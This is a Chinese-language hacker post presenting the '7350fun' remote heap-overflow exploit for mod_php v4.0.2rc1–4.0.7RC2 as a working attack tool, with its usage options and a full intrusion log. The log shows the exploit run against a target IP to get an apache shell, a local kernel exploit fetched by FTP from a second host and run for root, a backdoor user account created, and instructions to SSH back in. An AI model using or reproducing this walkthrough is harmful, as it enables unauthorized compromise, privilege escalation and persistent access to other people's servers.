找到PHP v4.0.2rc1-v4.0.7RC2 exploit program

从一台被黑的服务器上找到了如下工具

fun

此工具专门用来扫描PHP v4.0.2rc1-v4.0.7RC2的exploit程序。找到后通过堆溢出远程得到一个shell，得到root权限就更简单了。用法如下：

[root@linux_server tmp]# ./fun
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.

usage: ./fun [options]

Options:
  -c            check exploitability only, do not exploit
  -n            no check mode
  -s start      bruteforce start (top)
  -t target     choose target
                (1) PHP v4.0.2rc1-v4.0.5
                (2) PHP v4.0.6-v4.0.7RC2

经过测试，可以获得一个apache权限的远程shell。然后通过内核溢出程序可以得到本地root了。经过测试Redhat 7.2 服务器得到root权限。

方法如下：

[bob@bob linux_server]$ ./fun -c 202.x.x.x    /login.php                      (验证服务器的php版本)
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.

+ Checking for vulnerable PHP version...
+ passed: server says PHP/4.0.6                                                       (4.0.6，属于可以攻击范围 )
[bob@bob linux_server]$ ./fun -t 2 202.x.x.x  /login.php
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.

+ Checking for vulnerable PHP version...
+ passed: server says PHP/4.0.6

+ exploiting the bug now...

  [+++-------] trying: bffffecc                                                            (开始不断的发送溢出代码到remote server)
  [++++++++
  [++++++++++
  [+++++++---] trying: bffffe80
  [+++++++++
  [++++++++++] trying: bffffde8
  [+---------] trying: bffffde4

  [++
  [+++++++---] trying: bffffc70
  [++++++++

  [++++++----] trying: bffff9d4
  [+++++++
  [++++++++
  [+++++-----] trying: bffff9a0
  [++++++
  [+++++++
  [++++++++++] trying: bffff688
  [++++++++++] trying: bffff5dc                    

+ done ...                       (一个半小时后，系统告诉我成功了) :P

+ you should be connected to a dup-shell now
+ if not simply try again
command>
Linux manson 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31 EDT 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)                      (我已经远程登录进来了)

ls                                                                                               (敲个ls ,下面就是系统的目录)
bin
boot
dev
etc
home
initrd
lib
lost+found
misc
mnt
opt
proc
root
sbin
tmp
usr
var
cd /tmp
ftp 219.x.x.x                                                     (去拿内核溢出代码 for 2.4.7-10)
bob
Password:buyllshit
Name (219.x.x.x:apache): Not logged in.             (丫的密码敲错了)
Login failed.
by
ftp 219.x.x.x
bob
Password:bullshit                                                 (这回正确了)
cd backdoot
Name (219.x.x.x:apache): /backdoot: No such file or directory.      (目录敲错了)
cd backdoor
get xp                                                                (拿到内核本地溢出程序了)

by
chmod +x xp                                                       (放在tmp目录下面，给xp程序加可执行权限)
./xp
[+] Attached to 17306
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...                                 (溢出成功)

useradd bob                                          
/bin/sh: useradd: command not found                    (应该是我的path没有 /usr/sbin,那我直接去找好了)

locate useradd
/etc/default/useradd
/usr/sbin/useradd
/usr/share/man/man8/useradd.8.gz
cd /usr/sbin
./useradd bob                                                      (加好了bob)
passwd bob
New password: bullshit
BAD PASSWORD: it is based on a dictionary word
Retype new password: bullshit
Changing password for user bob
passwd: all authentication tokens updated successfully        (密码更改成功)

exit
exit

接下来的动作就不需要我重复了，自己用secure CRT软件ssh登陆你刚才设定好的用户名跟密码。然后还是执行那个xp程序，你就是root了。